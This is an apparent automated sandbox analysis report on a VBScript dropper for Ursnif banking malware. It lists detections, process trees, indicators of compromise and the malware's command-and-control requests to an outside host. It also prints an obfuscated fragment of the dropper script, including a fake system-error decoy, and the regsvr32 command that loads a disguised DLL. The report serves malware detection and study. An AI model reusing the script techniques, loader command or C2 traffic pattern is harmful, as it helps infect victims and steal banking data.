Loading ...

Play interactive tourEdit tour

Analysis Report amendments#_47148.vbs

Overview

General Information

Sample Name:amendments#_47148.vbs
MD5:de25f443cc3bd5ccf14d1b514e909bb3
SHA1:a74c82a1b059e4be6a234920092440948e40faf0
SHA256:1dcd128cc38a01779a240eeaec7b498107509e15f5d806c483644d9c1e4b9b8b

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates a COM Internet Explorer object
Creates processes via WMI
Deletes itself after installation
Machine Learning detection for dropped file
Sigma detected: Regsvr32 Anomaly
Writes or reads registry keys via WMI
Writes registry values via WMI
Abnormal high CPU Usage
Contains functionality locales information (e.g. system language)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 5088 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\amendments#_47148.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • regsvr32.exe (PID: 3788 cmdline: regsvr32 -s C:\Users\user\AppData\Local\Temp\qua.xpi MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 932 cmdline: -s C:\Users\user\AppData\Local\Temp\qua.xpi MD5: 426E7499F6A7346F0410DEAD0805586B)
  • iexplore.exe (PID: 5828 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5556 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5828 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.1149110295.0000000005698000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000003.00000003.1149197062.0000000005698000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.1148486257.0000000005698000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000003.00000003.1148805771.0000000005698000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.1148976781.0000000005698000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 4 entries

            Sigma Overview


            System Summary:

            barindex
            Sigma detected: Regsvr32 AnomalyShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: -s C:\Users\user\AppData\Local\Temp\qua.xpi, CommandLine: -s C:\Users\user\AppData\Local\Temp\qua.xpi, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -s C:\Users\user\AppData\Local\Temp\qua.xpi, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 3788, ProcessCommandLine: -s C:\Users\user\AppData\Local\Temp\qua.xpi, ProcessId: 932

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for domain / URLShow sources
            Source: cdn.arsis.atVirustotal: Detection: 6%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\qua.xpiVirustotal: Detection: 22%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\qua.xpiReversingLabs: Detection: 25%
            Multi AV Scanner detection for submitted fileShow sources
            Source: amendments#_47148.vbsVirustotal: Detection: 8%Perma Link
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\qua.xpiJoe Sandbox ML: detected

            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior

            Networking:

            barindex
            Creates a COM Internet Explorer objectShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Source: Joe Sandbox ViewIP Address: 47.241.8.147 47.241.8.147
            Source: Joe Sandbox ViewIP Address: 88.99.66.31 88.99.66.31
            Source: Joe Sandbox ViewIP Address: 88.99.66.31 88.99.66.31
            Source: Joe Sandbox ViewASN Name: unknown unknown
            Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
            Source: global trafficHTTP traffic detected: GET /api1/AEApm14UVcYD3SWDG/_2BgFR9KhIK_/2BUpwtpWfOV/aYGPxtTf9efbh_/2FZx7cCcv6oobF4ox5E_2/FVHEesS6_2BJXZVH/NvCNTgscAdeVBOs/T5DCrxBlFScOJ7VbGq/r_2B5AQf2/_2FJFRcz22Tdn7BvGIHO/pcYaJTFNPKP1YJtKZ4D/uOgC2nSCIkMaJPqU1jPiU3/6F8AiOKK2EXVu/mCZ490jj/ufri_2Boq9L1nf7r5wEMFia/eSw6kD7T2G/DfNaqQglnI6VxyDn5/Dbo_0A_0DVh6/DqIj_2B6ZkG/lLZyf9hue8GKSE/tVeCANdodPFajjSLDJ2qT/fxPG_2BNGGSCmwc4/miT_2BQz/l HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.arsis.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/AEApm14UVcYD3SWDG/favicon.ico HTTP/1.1User-Agent: AutoItHost: cdn.arsis.at
            Source: unknownDNS traffic detected: queries for: iplogger.org
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 Jun 2020 14:09:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d 00 8a d8 e8 43 a5 41 76 01 15 41 79 79 e9 99 79 15 c8 72 fa 20 d3 c1 0c a8 cb 00 90 3b 34 31 a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T*$'*gd*SJRl2MCAvAyyyr ;410
            Source: wscript.exe, 00000000.00000003.834537702.000002AD45E58000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
            Source: wscript.exe, 00000000.00000003.834537702.000002AD45E58000.00000004.00000001.sdmpString found in binary or memory: http://cert.int-x3.letsencrypt.org/0
            Source: wscript.exe, 00000000.00000003.834537702.000002AD45E58000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
            Source: wscript.exe, 00000000.00000003.834537702.000002AD45E58000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
            Source: wscript.exe, 00000000.00000003.834537702.000002AD45E58000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
            Source: wscript.exe, 00000000.00000003.834537702.000002AD45E58000.00000004.00000001.sdmpString found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
            Source: wscript.exe, 00000000.00000003.834537702.000002AD45E58000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
            Source: wscript.exe, 00000000.00000003.783201583.000002AD44F91000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1bD467
            Source: wscript.exe, 00000000.00000003.781986547.000002AD44F84000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.849852508.000002AD460AA000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1bP467
            Source: wscript.exe, 00000000.00000003.834537702.000002AD45E58000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1bP467pace
            Source: wscript.exe, 00000000.00000003.814871793.000002AD481A1000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/b?
            Source: wscript.exe, 00000000.00000003.842100899.000002AD4843B000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/sion
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.1149110295.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1149197062.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1148486257.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1148805771.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1148976781.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1148674591.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1148901441.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1149054686.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 932, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.1149110295.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1149197062.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1148486257.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1148805771.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1148976781.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1148674591.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1148901441.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1149054686.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 932, type: MEMORY

            System Summary:

            barindex
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess Stats: CPU usage > 98%
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E6415F3 NtMapViewOfSection,3_2_6E6415F3
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E6418DB NtCreateSection,memset,3_2_6E6418DB
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E642775 NtQueryVirtualMemory,3_2_6E642775
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E6425543_2_6E642554
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\qua.xpi 49FC4C06CF9FFA149CE9D9D03F354197B54B605291FC94835FAB1ABE9E9C9626
            Source: amendments#_47148.vbsInitial sample: Strings found which are bigger than 50
            Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: classification engineClassification label: mal100.bank.troj.evad.winVBS@7/7@4/2
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\amendments#_47148.vbs'
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: amendments#_47148.vbsVirustotal: Detection: 8%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\amendments#_47148.vbs'
            Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\Users\user\AppData\Local\Temp\qua.xpi
            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\qua.xpi
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5828 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\qua.xpiJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5828 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: amendments#_47148.vbsStatic file information: File size 1079613 > 1048576
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dllJump to behavior
            Source: Binary string: c:\Quite\pitch\east\And\Even\start\middle\next.pdb source: wscript.exe, 00000000.00000003.804282475.000002AD44FAE000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.1201151907.000000006E66A000.00000002.00020000.sdmp, qua.xpi.0.dr

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.ScriptName, cStr(270546191)) > 0 And dMGq = 0) ThenExit FunctionEnd IfJDE = 15if (JDE > ((53 - 6.0) + (-(48 - (35 + (-24.0)))))) Thenflw = Array(203)Dim neuron:Set neuron = CreateObject("WScript.Shell")sqTSE = neuron.RegRead("HKEY_CURRENT_USER\Control Panel\International\Geo\Nation")For Each hind In flwIf (hind = Cint(sqTSE)) ThenREM Steven mulatto technology resiny Bauhaus Cummins conservator. cumbersome Strom hasp mandrill too procaine extirpate sergeant, 6138352 Judaism sale typewritten farmhouse deuteron Malagasy delineate gossamer adolescent, marital Ferguson homogeneity. evaporate Ephraim hair, 7115897 failure. Platonism decode antiquarian, 5508839 militia embargo director coruscate wreath40("")BlombergFujitsuWScript.Quit' flatulent Frye sinew Ulster Debussy spectrometer parade Carbone, Thoreau anyone Grayson polecat panther Morrison apache psychophysic, whimsey executrix Dailey sucrose buxom memory victim flipflop inboard. 1947492 emphatic fluorite Greenbelt End IfNext' progress buteo fungicide nameplate Bolton mockernut Gilchrist click sexy, beady. myocardial phalarope sigma Dorado lump umbra Alton246 wilful foxhole103 psychosomatic ironbound forgo cubit stratospheric motive, 2477469 shift chief Nigeria End ifEnd FunctionFunction Fujitsu()inventive = MsgBox("The program cant start because MSVCR100.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")End FunctionFunction zJOk()REM foothill807 seraphim tarnish Levis. figaro rambunctious fail doomsday disembowel bug permute315 seder sabra whatever morsel bottle ingather curb entrant pudding, 771336 phobic mystic methyl. inapt on error resume next' hydrodynamic. 2432209 airflow chromosomal Jacques those millenarian Lynn trivia. 7572830 Janus happen303 jackdaw. aliphatic aggregate Rosetta Tarrytown McLeod bookmark medic902 relevant Caracas Hindu cadre cannel Barrett bookbind soar shortcoming, Pauli If (InStr(WScript.ScriptName, cStr(270546191)) > 0 And dMGq = 0) ThenExit FunctionEnd Ifset SxK = GetObject("winmgmts:\\.\root\cimv2")set jPuBlOS = SxK.InstancesOf("Win32_OperatingSystem")REM thou impartation Welles ibid arsenide mediate autopsy deprave soar435 majestic, 7805098 candlelight broad Formosa rotary handbook sweep Blackwell jive sandwich automorphism. hereditary lovebird, 2350665 woodcut develop evocate peanut blitz solipsism impasse symbolic riverbank ventilate searchlight orthodontic detriment oratoric vacuole for each surmount in jPuBlOS' eggplant, 1640424 beehive stinkbug Matson laconic chianti visitor. 6763580 failsafe Strickland triphammer glandular parabola mannitol ANSI Dow megabyte. quota deed wigging. Toni = surmount.LastBootUpTimeREM season hillock grief Dairylea jejune slurry, 2899406 Kaufman colonel pragmatic packet Hellenic545 veterinary. Rockefeller polymeric bough Bahama life Waterman common businessmen dolce hunk Bridget. inhabitant deformation polyandrous market Katowice anam
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E6424F0 push ecx; ret 3_2_6E6424F9
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E642543 push ecx; ret 3_2_6E642553
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E657A7B push ebp; ret 3_2_6E657AC8
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E658003 push ebp; iretd 3_2_6E658017
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E6556F4 push es; iretd 3_2_6E6556F5
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E655EC4 push dword ptr [ebp+597C1BE8h]; retf 3_2_6E655ECA
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E6547EE push edi; ret 3_2_6E6547EF
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E657BD0 push ebp; iretd 3_2_6E657BD4
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E654F90 push ecx; ret 3_2_6E654FB8
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E68237B push edx; ret 3_2_6E68237C
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E6827E2 push ds; retf 3_2_6E6827EB

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\qua.xpiJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\qua.xpiJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.1149110295.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1149197062.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1148486257.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1148805771.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1148976781.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1148674591.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1148901441.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1149054686.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 932, type: MEMORY
            Deletes itself after installationShow sources
            Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\amendments#_47148.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exe TID: 5172Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: wscript.exe, 00000000.00000002.854155251.000002AD489A0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: wscript.exe, 00000000.00000002.852842773.000002AD4821B000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000002.849852508.000002AD460AA000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW<"H
            Source: wscript.exe, 00000000.00000002.854155251.000002AD489A0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: wscript.exe, 00000000.00000002.854155251.000002AD489A0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: wscript.exe, 00000000.00000002.854155251.000002AD489A0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E641FA6 LdrInitializeThunk,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_6E641FA6
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E67F519 mov eax, dword ptr fs:[00000030h]3_2_6E67F519
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E67F44F mov eax, dword ptr fs:[00000030h]3_2_6E67F44F
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E67F059 push dword ptr fs:[00000030h]3_2_6E67F059
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E641E95 InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError,3_2_6E641E95

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: qua.xpi.0.drJump to dropped file
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 88.99.66.31 187Jump to behavior
            Source: regsvr32.exe, 00000002.00000002.1198250312.0000000001270000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1199411180.0000000003440000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: regsvr32.exe, 00000002.00000002.1198250312.0000000001270000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1199411180.0000000003440000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: regsvr32.exe, 00000002.00000002.1198250312.0000000001270000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1199411180.0000000003440000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: regsvr32.exe, 00000002.00000002.1198250312.0000000001270000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1199411180.0000000003440000.00000002.00000001.sdmpBinary or memory string: Progmanlock

            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,3_2_6E641E58
            Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E641BB9 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,3_2_6E641BB9
